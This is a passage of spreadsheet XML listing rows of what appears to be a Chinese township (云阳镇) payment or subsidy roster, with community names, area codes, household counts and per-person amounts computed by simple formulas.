      <c r="I1694" s="17">
        <f t="shared" si="91"/>
        <v>650</v>
      </c>
      <c r="J1694" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1694" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1695" customHeight="1" spans="1:11">
      <c r="A1695" s="16" t="s">
        <v>4529</v>
      </c>
      <c r="B1695" s="17" t="str">
        <f>B1694</f>
        <v>云阳镇</v>
      </c>
      <c r="C1695" s="17" t="str">
        <f>C1694</f>
        <v>云钢社区</v>
      </c>
      <c r="D1695" s="32" t="s">
        <v>4530</v>
      </c>
      <c r="E1695" s="32" t="s">
        <v>4387</v>
      </c>
      <c r="F1695" s="17" t="str">
        <f>F1694</f>
        <v>4113210599</v>
      </c>
      <c r="G1695" s="17"/>
      <c r="H1695" s="17"/>
      <c r="I1695" s="17"/>
      <c r="J1695" s="17"/>
      <c r="K1695" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1696" customHeight="1" spans="1:11">
      <c r="A1696" s="16" t="s">
        <v>4531</v>
      </c>
      <c r="B1696" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1696" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1696" s="17" t="s">
        <v>4532</v>
      </c>
      <c r="E1696" s="17" t="s">
        <v>4533</v>
      </c>
      <c r="F1696" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1696" s="17">
        <v>1</v>
      </c>
      <c r="H1696" s="18">
        <v>365</v>
      </c>
      <c r="I1696" s="17">
        <f>H1696*G1696</f>
        <v>365</v>
      </c>
      <c r="J1696" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1696" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1697" customHeight="1" spans="1:11">
      <c r="A1697" s="16" t="s">
        <v>4534</v>
      </c>
      <c r="B1697" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1697" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1697" s="17" t="s">
        <v>4535</v>
      </c>
      <c r="E1697" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F1697" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1697" s="17">
        <v>1</v>
      </c>
      <c r="H1697" s="18">
        <v>365</v>
      </c>
      <c r="I1697" s="17">
        <f>H1697*G1697</f>
        <v>365</v>
      </c>
      <c r="J1697" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1697" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1698" customHeight="1" spans="1:11">
      <c r="A1698" s="16" t="s">
        <v>4536</v>
      </c>
      <c r="B1698" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1698" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1698" s="17" t="s">
        <v>4537</v>
      </c>
      <c r="E1698" s="17" t="s">
        <v>4538</v>
      </c>
      <c r="F1698" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1698" s="17">
        <v>1</v>
      </c>
      <c r="H1698" s="18">
        <v>365</v>
      </c>
      <c r="I1698" s="17">
        <f>H1698*G1698</f>
        <v>365</v>
      </c>
      <c r="J1698" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1698" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1699" customHeight="1" spans="1:11">
      <c r="A1699" s="16" t="s">
        <v>4539</v>
      </c>
      <c r="B1699" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1699" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1699" s="17" t="s">
        <v>4540</v>
      </c>
      <c r="E1699" s="17" t="s">
        <v>3563</v>
      </c>
      <c r="F1699" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1699" s="17">
        <v>1</v>
      </c>
      <c r="H1699" s="18">
        <v>365</v>
      </c>
      <c r="I1699" s="17">
        <f>H1699*G1699</f>
        <v>365</v>
      </c>
      <c r="J1699" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1699" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1700" customHeight="1" spans="1:11">
      <c r="A1700" s="16" t="s">
        <v>4541</v>
      </c>
      <c r="B1700" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1700" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1700" s="17" t="s">
        <v>4542</v>
      </c>
      <c r="E1700" s="17" t="s">
        <v>3256</v>
      </c>
      <c r="F1700" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1700" s="17">
        <v>2</v>
      </c>
      <c r="H1700" s="18">
        <v>325</v>
      </c>
      <c r="I1700" s="17">
        <f>H1700*G1700</f>
        <v>650</v>
      </c>
      <c r="J1700" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1700" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1701" customHeight="1" spans="1:11">
      <c r="A1701" s="16" t="s">
        <v>4543</v>
      </c>
      <c r="B1701" s="17" t="str">
        <f>B1700</f>
        <v>云阳镇</v>
      </c>
      <c r="C1701" s="17" t="str">
        <f>C1700</f>
        <v>云钢社区</v>
      </c>
      <c r="D1701" s="32" t="s">
        <v>4544</v>
      </c>
      <c r="E1701" s="32" t="s">
        <v>4545</v>
      </c>
      <c r="F1701" s="17" t="str">
        <f>F1700</f>
        <v>4113210599</v>
      </c>
      <c r="G1701" s="17"/>
      <c r="H1701" s="17"/>
      <c r="I1701" s="17"/>
      <c r="J1701" s="17"/>
      <c r="K1701" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1702" customHeight="1" spans="1:11">
      <c r="A1702" s="16" t="s">
        <v>4546</v>
      </c>
      <c r="B1702" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1702" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1702" s="17" t="s">
        <v>4547</v>
      </c>
      <c r="E1702" s="17" t="s">
        <v>3806</v>
      </c>
      <c r="F1702" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1702" s="17">
        <v>1</v>
      </c>
      <c r="H1702" s="18">
        <v>365</v>
      </c>
      <c r="I1702" s="17">
        <f t="shared" ref="I1702:I1712" si="92">H1702*G1702</f>
        <v>365</v>
      </c>
      <c r="J1702" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1702" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1703" customHeight="1" spans="1:11">
      <c r="A1703" s="16" t="s">
        <v>4548</v>
      </c>
      <c r="B1703" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1703" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1703" s="17" t="s">
        <v>4549</v>
      </c>
      <c r="E1703" s="17" t="s">
        <v>4550</v>
      </c>
      <c r="F1703" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1703" s="17">
        <v>1</v>
      </c>
      <c r="H1703" s="18">
        <v>365</v>
      </c>
      <c r="I1703" s="17">
        <f t="shared" si="92"/>
        <v>365</v>
      </c>
      <c r="J1703" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1703" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1704" customHeight="1" spans="1:11">
      <c r="A1704" s="16" t="s">
        <v>4551</v>
      </c>
      <c r="B1704" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1704" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1704" s="17" t="s">
        <v>4552</v>
      </c>
      <c r="E1704" s="17" t="s">
        <v>4553</v>
      </c>
      <c r="F1704" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1704" s="17">
        <v>1</v>
      </c>
      <c r="H1704" s="18">
        <v>365</v>
      </c>
      <c r="I1704" s="17">
        <f t="shared" si="92"/>
        <v>365</v>
      </c>
      <c r="J1704" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1704" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1705" customHeight="1" spans="1:11">
      <c r="A1705" s="16" t="s">
        <v>4554</v>
      </c>
      <c r="B1705" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1705" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1705" s="17" t="s">
        <v>4555</v>
      </c>
      <c r="E1705" s="17" t="s">
        <v>4556</v>
      </c>
      <c r="F1705" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1705" s="17">
        <v>1</v>
      </c>
      <c r="H1705" s="18">
        <v>365</v>
      </c>
      <c r="I1705" s="17">
        <f t="shared" si="92"/>
        <v>365</v>
      </c>
      <c r="J1705" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1705" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1706" customHeight="1" spans="1:11">
      <c r="A1706" s="16" t="s">
        <v>4557</v>
      </c>
      <c r="B1706" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1706" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1706" s="17" t="s">
        <v>4558</v>
      </c>
      <c r="E1706" s="17" t="s">
        <v>3772</v>
      </c>
      <c r="F1706" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1706" s="17">
        <v>1</v>
      </c>
      <c r="H1706" s="18">
        <v>365</v>
      </c>
      <c r="I1706" s="17">
        <f t="shared" si="92"/>
        <v>365</v>
      </c>
      <c r="J1706" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1706" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1707" customHeight="1" spans="1:11">
      <c r="A1707" s="16" t="s">
        <v>4559</v>
      </c>
      <c r="B1707" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1707" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1707" s="17" t="s">
        <v>4560</v>
      </c>
      <c r="E1707" s="17" t="s">
        <v>425</v>
      </c>
      <c r="F1707" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1707" s="17">
        <v>1</v>
      </c>
      <c r="H1707" s="18">
        <v>365</v>
      </c>
      <c r="I1707" s="17">
        <f t="shared" si="92"/>
        <v>365</v>
      </c>
      <c r="J1707" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1707" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1708" customHeight="1" spans="1:11">
      <c r="A1708" s="16" t="s">
        <v>4561</v>
      </c>
      <c r="B1708" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1708" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1708" s="17" t="s">
        <v>4562</v>
      </c>
      <c r="E1708" s="17" t="s">
        <v>4563</v>
      </c>
      <c r="F1708" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1708" s="17">
        <v>1</v>
      </c>
      <c r="H1708" s="18">
        <v>365</v>
      </c>
      <c r="I1708" s="17">
        <f t="shared" si="92"/>
        <v>365</v>
      </c>
      <c r="J1708" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1708" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1709" customHeight="1" spans="1:11">
      <c r="A1709" s="16" t="s">
        <v>4564</v>
      </c>
      <c r="B1709" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1709" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1709" s="17" t="s">
        <v>4565</v>
      </c>
      <c r="E1709" s="17" t="s">
        <v>3693</v>
      </c>
      <c r="F1709" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1709" s="17">
        <v>1</v>
      </c>
      <c r="H1709" s="18">
        <v>365</v>
      </c>
      <c r="I1709" s="17">
        <f t="shared" si="92"/>
        <v>365</v>
      </c>
      <c r="J1709" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1709" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1710" customHeight="1" spans="1:11">
      <c r="A1710" s="16" t="s">
        <v>4566</v>
      </c>
      <c r="B1710" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1710" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1710" s="17" t="s">
        <v>4567</v>
      </c>
      <c r="E1710" s="17" t="s">
        <v>3664</v>
      </c>
      <c r="F1710" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1710" s="17">
        <v>1</v>
      </c>
      <c r="H1710" s="18">
        <v>365</v>
      </c>
      <c r="I1710" s="17">
        <f t="shared" si="92"/>
        <v>365</v>
      </c>
      <c r="J1710" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1710" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1711" customHeight="1" spans="1:11">
      <c r="A1711" s="16" t="s">
        <v>4568</v>
      </c>
      <c r="B1711" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1711" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1711" s="17" t="s">
        <v>4569</v>
      </c>
      <c r="E1711" s="17" t="s">
        <v>2850</v>
      </c>
      <c r="F1711" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1711" s="17">
        <v>1</v>
      </c>
      <c r="H1711" s="18">
        <v>365</v>
      </c>
      <c r="I1711" s="17">
        <f t="shared" si="92"/>
        <v>365</v>
      </c>
      <c r="J1711" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1711" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1712" customHeight="1" spans="1:11">
      <c r="A1712" s="16" t="s">
        <v>4570</v>
      </c>
      <c r="B1712" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1712" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1712" s="17" t="s">
        <v>4571</v>
      </c>
      <c r="E1712" s="17" t="s">
        <v>3506</v>
      </c>
      <c r="F1712" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1712" s="17">
        <v>3</v>
      </c>
      <c r="H1712" s="18">
        <v>290</v>
      </c>
      <c r="I1712" s="17">
        <f t="shared" si="92"/>
        <v>870</v>
      </c>
      <c r="J1712" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1712" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1713" customHeight="1" spans="1:11">
      <c r="A1713" s="16" t="s">
        <v>4572</v>
      </c>
      <c r="B1713" s="17" t="str">
        <f>B1712</f>
        <v>云阳镇</v>
      </c>
      <c r="C1713" s="17" t="str">
        <f>C1712</f>
        <v>云钢社区</v>
      </c>
      <c r="D1713" s="32" t="s">
        <v>4573</v>
      </c>
      <c r="E1713" s="32" t="s">
        <v>3846</v>
      </c>
      <c r="F1713" s="17" t="str">
        <f>F1712</f>
        <v>4113210599</v>
      </c>
      <c r="G1713" s="17"/>
      <c r="H1713" s="17"/>
      <c r="I1713" s="17"/>
      <c r="J1713" s="17"/>
      <c r="K1713" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1714" customHeight="1" spans="1:11">
      <c r="A1714" s="16" t="s">
        <v>4574</v>
      </c>
      <c r="B1714" s="17" t="str">
        <f>B1713</f>
        <v>云阳镇</v>
      </c>
      <c r="C1714" s="17" t="str">
        <f>C1713</f>
        <v>云钢社区</v>
      </c>
      <c r="D1714" s="51" t="s">
        <v>4575</v>
      </c>
      <c r="E1714" s="32" t="s">
        <v>4576</v>
      </c>
      <c r="F1714" s="17" t="str">
        <f>F1713</f>
        <v>4113210599</v>
      </c>
      <c r="G1714" s="17"/>
      <c r="H1714" s="17"/>
      <c r="I1714" s="17"/>
      <c r="J1714" s="17"/>
      <c r="K1714" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1715" customHeight="1" spans="1:11">
      <c r="A1715" s="16" t="s">
        <v>4577</v>
      </c>
      <c r="B1715" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1715" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1715" s="17" t="s">
        <v>4578</v>
      </c>
      <c r="E1715" s="17" t="s">
        <v>3601</v>
      </c>
      <c r="F1715" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1715" s="17">
        <v>1</v>
      </c>
      <c r="H1715" s="18">
        <v>365</v>
      </c>
      <c r="I1715" s="17">
        <f t="shared" ref="I1715:I1722" si="93">H1715*G1715</f>
        <v>365</v>
      </c>
      <c r="J1715" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1715" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1716" customHeight="1" spans="1:11">
      <c r="A1716" s="16" t="s">
        <v>4579</v>
      </c>
      <c r="B1716" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1716" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1716" s="17" t="s">
        <v>4580</v>
      </c>
      <c r="E1716" s="17" t="s">
        <v>4581</v>
      </c>
      <c r="F1716" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1716" s="17">
        <v>1</v>
      </c>
      <c r="H1716" s="18">
        <v>365</v>
      </c>
      <c r="I1716" s="17">
        <f t="shared" si="93"/>
        <v>365</v>
      </c>
      <c r="J1716" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1716" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1717" customHeight="1" spans="1:11">
      <c r="A1717" s="16" t="s">
        <v>4582</v>
      </c>
      <c r="B1717" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1717" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1717" s="17" t="s">
        <v>4583</v>
      </c>
      <c r="E1717" s="17" t="s">
        <v>4584</v>
      </c>
      <c r="F1717" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1717" s="17">
        <v>1</v>
      </c>
      <c r="H1717" s="18">
        <v>365</v>
      </c>
      <c r="I1717" s="17">
        <f t="shared" si="93"/>
        <v>365</v>
      </c>
      <c r="J1717" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1717" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1718" customHeight="1" spans="1:11">
      <c r="A1718" s="16" t="s">
        <v>4585</v>
      </c>
      <c r="B1718" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1718" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1718" s="17" t="s">
        <v>4586</v>
      </c>
      <c r="E1718" s="17" t="s">
        <v>4587</v>
      </c>
      <c r="F1718" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1718" s="17">
        <v>1</v>
      </c>
      <c r="H1718" s="18">
        <v>365</v>
      </c>
      <c r="I1718" s="17">
        <f t="shared" si="93"/>
        <v>365</v>
      </c>
      <c r="J1718" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1718" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1719" customHeight="1" spans="1:11">
      <c r="A1719" s="16" t="s">
        <v>4588</v>
      </c>
      <c r="B1719" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1719" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1719" s="17" t="s">
        <v>4589</v>
      </c>
      <c r="E1719" s="17" t="s">
        <v>4590</v>
      </c>
      <c r="F1719" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1719" s="17">
        <v>1</v>
      </c>
      <c r="H1719" s="17">
        <v>500</v>
      </c>
      <c r="I1719" s="17">
        <f t="shared" si="93"/>
        <v>500</v>
      </c>
      <c r="J1719" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1719" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1720" customHeight="1" spans="1:11">
      <c r="A1720" s="16" t="s">
        <v>4591</v>
      </c>
      <c r="B1720" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1720" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1720" s="17" t="s">
        <v>4592</v>
      </c>
      <c r="E1720" s="17" t="s">
        <v>4593</v>
      </c>
      <c r="F1720" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1720" s="17">
        <v>1</v>
      </c>
      <c r="H1720" s="18">
        <v>365</v>
      </c>
      <c r="I1720" s="17">
        <f t="shared" si="93"/>
        <v>365</v>
      </c>
      <c r="J1720" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1720" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1721" customHeight="1" spans="1:11">
      <c r="A1721" s="16" t="s">
        <v>4594</v>
      </c>
      <c r="B1721" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1721" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1721" s="17" t="s">
        <v>4595</v>
      </c>
      <c r="E1721" s="17" t="s">
        <v>3806</v>
      </c>
      <c r="F1721" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1721" s="17">
        <v>1</v>
      </c>
      <c r="H1721" s="18">
        <v>365</v>
      </c>
      <c r="I1721" s="17">
        <f t="shared" si="93"/>
        <v>365</v>
      </c>
      <c r="J1721" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1721" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1722" customHeight="1" spans="1:11">
      <c r="A1722" s="16" t="s">
        <v>4596</v>
      </c>
      <c r="B1722" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1722" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1722" s="17" t="s">
        <v>4597</v>
      </c>
      <c r="E1722" s="17" t="s">
        <v>4598</v>
      </c>
      <c r="F1722" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1722" s="17">
        <v>2</v>
      </c>
      <c r="H1722" s="18">
        <v>325</v>
      </c>
      <c r="I1722" s="17">
        <f t="shared" si="93"/>
        <v>650</v>
      </c>
      <c r="J1722" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K1722" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1723" customHeight="1" spans="1:11">
      <c r="A1723" s="16" t="s">
        <v>4600</v>
      </c>
      <c r="B1723" s="17" t="str">
        <f>B1722</f>
        <v>云阳镇</v>
      </c>
      <c r="C1723" s="17" t="str">
        <f>C1722</f>
        <v>老城社区</v>
      </c>
      <c r="D1723" s="52" t="s">
        <v>4601</v>
      </c>
      <c r="E1723" s="53" t="s">
        <v>4602</v>
      </c>
      <c r="F1723" s="17" t="str">
        <f>F1722</f>
        <v>4113210523</v>
      </c>
      <c r="G1723" s="17"/>
      <c r="H1723" s="17"/>
      <c r="I1723" s="17"/>
      <c r="J1723" s="17"/>
      <c r="K1723" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1724" customHeight="1" spans="1:11">
      <c r="A1724" s="16" t="s">
        <v>4603</v>
      </c>
      <c r="B1724" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1724" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1724" s="17" t="s">
        <v>4604</v>
      </c>
      <c r="E1724" s="17" t="s">
        <v>4605</v>
      </c>
      <c r="F1724" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1724" s="17">
        <v>2</v>
      </c>
      <c r="H1724" s="18">
        <v>325</v>
      </c>
      <c r="I1724" s="17">
        <f>H1724*G1724</f>
        <v>650</v>
      </c>
      <c r="J1724" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K1724" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1725" customHeight="1" spans="1:11">
      <c r="A1725" s="16" t="s">
        <v>4606</v>
      </c>
      <c r="B1725" s="17" t="str">
        <f>B1724</f>
        <v>云阳镇</v>
      </c>
      <c r="C1725" s="17" t="str">
        <f>C1724</f>
        <v>老城社区</v>
      </c>
      <c r="D1725" s="54" t="s">
        <v>4607</v>
      </c>
      <c r="E1725" s="55" t="s">
        <v>4608</v>
      </c>
      <c r="F1725" s="17" t="str">
        <f>F1724</f>
        <v>4113210523</v>
      </c>
      <c r="G1725" s="17"/>
      <c r="H1725" s="17"/>
      <c r="I1725" s="17"/>
      <c r="J1725" s="17"/>
      <c r="K1725" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1726" customHeight="1" spans="1:11">
      <c r="A1726" s="16" t="s">
        <v>4609</v>
      </c>
      <c r="B1726" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1726" s="17" t="s">
        <v>4610</v>
      </c>
      <c r="D1726" s="17" t="s">
        <v>4611</v>
      </c>
      <c r="E1726" s="17" t="s">
        <v>4393</v>
      </c>
      <c r="F1726" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1726" s="17">
        <v>3</v>
      </c>
      <c r="H1726" s="18">
        <v>320</v>
      </c>
      <c r="I1726" s="17">
        <f>H1726*G1726</f>
        <v>960</v>
      </c>
      <c r="J1726" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K1726" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1727" customHeight="1" spans="1:11">
      <c r="A1727" s="16" t="s">
        <v>4612</v>
      </c>
      <c r="B1727" s="17" t="str">
        <f>B1726</f>
        <v>云阳镇</v>
      </c>
      <c r="C1727" s="17" t="str">
        <f>C1726</f>
        <v>小关居委会五组</v>
      </c>
      <c r="D1727" s="52" t="s">
        <v>4613</v>
      </c>
      <c r="E1727" s="53" t="s">
        <v>3657</v>
      </c>
      <c r="F1727" s="17" t="str">
        <f>F1726</f>
        <v>4113210521</v>
      </c>
      <c r="G1727" s="17"/>
      <c r="H1727" s="17"/>
      <c r="I1727" s="17"/>
      <c r="J1727" s="17"/>
      <c r="K1727" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1728" customHeight="1" spans="1:11">
      <c r="A1728" s="16" t="s">
        <v>4614</v>
      </c>
      <c r="B1728" s="17" t="str">
        <f>B1727</f>
        <v>云阳镇</v>
      </c>
      <c r="C1728" s="17" t="str">
        <f>C1727</f>
        <v>小关居委会五组</v>
      </c>
      <c r="D1728" s="56" t="s">
        <v>4615</v>
      </c>
      <c r="E1728" s="57" t="s">
        <v>3651</v>
      </c>
      <c r="F1728" s="17" t="str">
        <f>F1727</f>
        <v>4113210521</v>
      </c>
      <c r="G1728" s="17"/>
      <c r="H1728" s="17"/>
      <c r="I1728" s="17"/>
      <c r="J1728" s="17"/>
      <c r="K1728" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1729" customHeight="1" spans="1:11">
      <c r="A1729" s="16" t="s">
        <v>4616</v>
      </c>
      <c r="B1729" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1729" s="17" t="s">
        <v>4617</v>
      </c>
      <c r="D1729" s="17" t="s">
        <v>4618</v>
      </c>
      <c r="E1729" s="17" t="s">
        <v>4619</v>
      </c>
      <c r="F1729" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1729" s="17">
        <v>1</v>
      </c>
      <c r="H1729" s="18">
        <v>365</v>
      </c>
      <c r="I1729" s="17">
        <f>H1729*G1729</f>
        <v>365</v>
      </c>
      <c r="J1729" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K1729" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1730" customHeight="1" spans="1:11">
      <c r="A1730" s="16" t="s">
        <v>4620</v>
      </c>
      <c r="B1730" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1730" s="17" t="s">
        <v>4621</v>
      </c>
      <c r="D1730" s="17" t="s">
        <v>4622</v>
      </c>
      <c r="E1730" s="17" t="s">
        <v>4623</v>
      </c>
      <c r="F1730" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1730" s="17">
        <v>1</v>
      </c>
      <c r="H1730" s="18">
        <v>365</v>
      </c>
      <c r="I1730" s="17">
        <f>H1730*G1730</f>
        <v>365</v>
      </c>
      <c r="J1730" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K1730" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1731" customHeight="1" spans="1:11">
      <c r="A1731" s="16" t="s">
        <v>4624</v>
      </c>
      <c r="B1731" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1731" s="17" t="s">
        <v>4625</v>
      </c>
      <c r="D1731" s="17" t="s">
        <v>4626</v>
      </c>
      <c r="E1731" s="17" t="s">
        <v>3846</v>
      </c>
      <c r="F1731" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1731" s="17">
        <v>1</v>
      </c>
      <c r="H1731" s="18">
        <v>365</v>
      </c>
      <c r="I1731" s="17">
        <f>H1731*G1731</f>
        <v>365</v>
      </c>
      <c r="J1731" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K1731" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1732" customHeight="1" spans="1:11">
      <c r="A1732" s="16" t="s">
        <v>4627</v>
      </c>
      <c r="B1732" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1732" s="17" t="s">
        <v>4621</v>
      </c>
      <c r="D1732" s="17" t="s">
        <v>4628</v>
      </c>
      <c r="E1732" s="17" t="s">
        <v>4629</v>
      </c>
      <c r="F1732" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1732" s="17">
        <v>2</v>
      </c>
      <c r="H1732" s="18">
        <v>325</v>
      </c>
      <c r="I1732" s="17">
        <f>H1732*G1732</f>
        <v>650</v>
      </c>
      <c r="J1732" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K1732" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1733" customHeight="1" spans="1:11">
      <c r="A1733" s="16" t="s">
        <v>4630</v>
      </c>
      <c r="B1733" s="17" t="str">
        <f>B1732</f>
        <v>云阳镇</v>
      </c>
      <c r="C1733" s="17" t="str">
        <f>C1732</f>
        <v>小关居委会二组</v>
      </c>
      <c r="D1733" s="52" t="s">
        <v>4631</v>
      </c>
      <c r="E1733" s="53" t="s">
        <v>4632</v>
      </c>
      <c r="F1733" s="17" t="str">
